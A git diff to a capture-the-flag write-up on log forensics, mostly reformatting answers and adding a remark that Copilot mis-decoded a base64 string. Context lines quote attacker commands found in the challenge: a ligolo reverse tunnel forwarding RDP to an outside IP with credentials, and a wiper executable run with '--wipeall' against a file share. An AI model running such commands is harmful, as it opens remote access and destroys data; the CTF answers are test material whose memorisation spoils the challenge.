--- a/docs/objectives/o13.md
+++ b/docs/objectives/o13.md
@@ -134,7 +134,8 @@ The attacker created an reverse tunnel connection with the compromised machine. 
 	"ligolo" --bind 0.0.0.0:1251 --forward 127.0.0.1:3389 --to 113.37.9.17:22 --username rednose --password falalalala --no-antispoof
 
 What is the timestamp when the attackers enumerated network shares on the machine?  2023-12-02T16:51:44Z
-	This is from the 'net share' command when it should have been 'net use' 
+
+	This is from the 'net share' command when it should have been from the 'net use' command
 
 What was the hostname of the system the attacker moved laterally to? NorthPolefileshare
 
@@ -164,11 +165,13 @@ What is the name of the executable the attackers used in the final malicious com
 What was the command line flag used alongside this executable?  --wipeall
 
 ----- Solution ------
+
 print base64_decode_tostring('QmV3YXJlIHRoZSBDdWJlIHRoYXQgV29tYmxlcw==')
 Beware the Cube that Wombles
 
 
 ----- Notes --------
+
 Case 4 time stamp for the command to list network shares was actually not correct. The challenge accepted the timestamp of the net /share command rather than net use.
     
     Powershell code found:
@@ -191,6 +194,8 @@ C:\Windows\System32\downwithsanta.exe --wipeall \\\\NorthPolefileshare\\c$
 
 ### Images
 
+Notice that Copilot did not translate this correctly. This caused me a lot of frustration until I went back and looked at the code manually. For some reason Copilot excluded the 'Naughty' part of the string.
+
 ![MS Copilot help](../img/objectives/o13/decoded_from_ms_copilot.PNG)
 
 
@@ -200,8 +205,4 @@ C:\Windows\System32\downwithsanta.exe --wipeall \\\\NorthPolefileshare\\c$
 ## Response
 
 !!! quote "Tangle Coalbox"
-    I had my doubts, but you've proven your worth.
-
-That phishing scheme won't trouble our client's organization anymore, thanks to your keen eye and investigatory prowess.
-
-So long, Gumshoe, and be careful out there.
+    I had my doubts, but you've proven your worth. That phishing scheme won't trouble our client's organization anymore, thanks to your keen eye and investigatory prowess. So long, Gumshoe, and be careful out there.
